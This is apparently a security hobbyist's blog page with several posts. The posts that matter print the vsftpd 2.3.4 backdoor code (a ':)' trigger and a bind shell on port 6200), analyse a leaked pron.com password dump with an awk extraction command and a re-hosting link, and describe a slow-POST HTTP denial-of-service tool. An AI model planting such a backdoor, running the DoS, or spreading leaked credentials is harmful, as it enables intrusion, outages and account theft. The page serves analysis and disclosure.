Vsftpd Backdoor Discovered

As you may have seen, there was a backdoor planted within version 2.3.4 of Vsftpd. Along with the announcement came confirmation from Chris Evans that Vsftpd’s hosting would be moved to Google.

The backdoor trigger was planed within ‘str.c’:



else if((p_str->p_buf[i]==0x3a)
&& (p_str->p_buf[i+1]==0x29))
{
vsf_sysutil_extra();
}

As you can see, the code searches for bytes 0x3a and 0x29: or ‘:)’ for those who don’t like ASCII.

The vsf_sysutil_extra(); function is then inserted into sysdeputil.c as:


int vsf_sysutil_extra(void)
{
int fd, rfd;
struct sockaddr_in sa;
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6200);
sa.sin_addr.s_addr = INADDR_ANY;
if((bind(fd,(struct sockaddr *)&sa,
sizeof(struct sockaddr))) < 0) exit(1);
if((listen(fd, 100)) == -1) exit(1);
for(;;)
{
rfd = accept(fd, 0, 0);
close(0); close(1); close(2);
dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
execl("/bin/sh","sh",(char *)0);
}
}

Quite a simple and obvious backdoor, with no real attempt made to obscure the payload. This simply binds to port 6200 and listens forever, accepting connections and spawning a shell.

Advertisements

LulzSec pron.com Password Dump

Recently there was a post made to twitter from lulzsec releasing the username / password dump from pron.com (including some rather ’embarrassing’ email addresses).

The password dump can be found here (It seems that this link is no longer available)

I decided to take a look through the database and see just what passwords people were using:

The statistics are:

25945 total username / password entries

20766 unique passwords

The most common password in use were:

123456 – 670 times

123456789 – 212 times

12345 – 111 times

1234 – 75 times

12345678 – 72 times

1234567 – 65 times

password – 62 times

1234567890 – 52 times

123 – 49 times

123123 – 41 times

If you want to parse the text file and dump raw passwords, a little command-line fu’ is all that’s needed:

awk -F "|" "{ print substr(\$2, 2) }"  pronz_with_count.txt

I’ve made a dump of the password file which can be found here

Change of Address / New Blog Design

As you may have noticed (I hope :D) I have launched the redesigned of my blog. This is to coincide with the new address http://www.xpnsbraindump.com, and was long overdue. My hope is that I can now structure content in a way which is easy to find, and is less random.

I have also moved my social focus to the HAK5 irc channel rather than r00tsecurity. If you are interested in an active IRC channel with a varied array of topics, this is the place.

I would love to hear any opinions on the new design.

LastPass Security Issue

Recently I heard about the LastPass security issue that had been posted on their blog here

First, I should applaud LastPass in their open nature regarding ‘suspected’ security vulnerabilities. I believe that they have dealt with this issue well and in recent times, we all know of the issues that delaying security information can have (ahem *Sony*)

Saying that, today I came to re-install Windows 7 on my laptop, and installed the LastPass Chrome plugin. Trying to authenticate to my twitter account, I came across a problem, so I checked out the LastPass.com website for any updates, and was asked to enter my email address for an activation link to be sent.

It seems from the LastPass blog post that this is a temporary solution to mitigate the high volume of traffic that they were receiving of people resetting passwords.

This pointed out a huge issue for me: How could I log into my email’s to authenticate my LastPass account, when I couldn’t access LastPass to retrieve my email password?

Of course, there are other ways around this (such as using LastPass pocket or another locally stored LastPass database), but in a world Cloud Computing, where Amazon backs up your data, Google stores your blog, LastPass stores your security credentials, PayPal stores your finances, and Flickr stores your family photos, is our reliance on Cloud Computing not as fruitful as first thought?

Gadget Show Live 2011

Today we visited the The Gadget Show Live 2011, the UK’s electronic show where big name brands come together to show off their latest wares.
This is the second time that I have been to TGSL, and this year didn’t disappoint.
I must stress, at first glance I was pretty disappointed with the quality of the stands this year. Many seemed to be full of cheap tat that can be found at any local computer market, even Npower made another appearance trying to have people switch their energy suppliers (I mean come on guys, people have better things to do at these events than talk about how much they pay for their energy). Nvidia were supposed to show their Tegra range, but unfortunately I couldn’t find anything about it.
I’m mostly interested in the computer technology at these things, rather than the household electronics (TV’s, DVD players etc), so I spend most of my time in the ‘Game Zone’ drooling over the latest game previews and hardware. Again, it was all pretty standard stuff, Nvidia 3d experience, PC’s draped in neon lighting, an array of scantily clad females, and The Prodigy blaring in the background.
That is until we noticed a sign in the corner.. “Over 18’s Only, ID will be required“. Pulling back the curtains, we found this:

Now for those of you who know me, you will know how much I love Gears Of War. This game isn’t out on Beta release until Monday, so to get to play it 3 days early was HUGE. After queuing for what felt like a lifetime, I managed to get a go on the new Team Deathmatch mode, and I can tell you all that this game doesn’t disappoint. To see some footage of the upcoming game, visit my youtube profile here.
Another suprise we found behind the ’18s Only’ curtain was this blast from the past:

The Duke Nukem Forever stand had a Beta of the upcoming June release running on an XBox Development Kit on an array of stands which seemed very popular with the crowds. There were some showings of Mortal Kombat which were also very popular. There’s something hugely satisfying about beating your rivals to death with their own arm with Drum and Bass pumping in the background (or is that just me).
So, moral of the story.. if you ever see a curtain marked “Over 18s Only”, you can bet your ass that there is something sweet behind it 😀
Overall verdict of The Gadget Show Live 2011.. brilliant for gamers, but must try harder with consumer tech.

HTTP Gets a New Form Of Attack (Part 2)

Ok, the other day I blogged about the new vulnerability discovered on OWASP regarding a HTTP DOS attack utilising the POST Content-Length and slow sending data.
Well I finally got a free couple of hours in my schedule so decided to create a very simple tool to test if this really worked. The tool itself can be found at https://github.com/xpn/HTTP-Post-DOS-Tool. No permission is provided for this tool to be used for malicious purposes. I have intentionally given the User-Agent a obvious ID and any unauthorised use can be easily detected in logs with a simple grep of “XPN HTTP DOS Tester”. You have been warned !
By default it spawns 300 threads all which sends POST data to the HTTP server at a rate of 1 byte per 10 seconds. Almost instantaneously, my test HTTP server I had to hand (an Apache 2.2.13 box with no current traffic) froze with multiple error messages of:
[Thu Nov 25 00:23:57 2010] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 0 idle, and 250 total children
This confirms with reports on other blogs about the success of this attack. Once this tool was running I was unable to request any pages from the test HTTP server (via GET or POST).
One thing to bear in mind with this attack is that my test server was only configured for 256 simultaneous connections. Obviously sites will have a lot more than this configured (and multiple HTTP servers) which somewhat removes the realism of this test.
The concerning thing I found is that a single machine is quite easily capable of crippling a local HTTP server with ease meaning local Intranet HTTP servers are suddenly very easy prey for a malicious attacker.
Below is a video of this in action.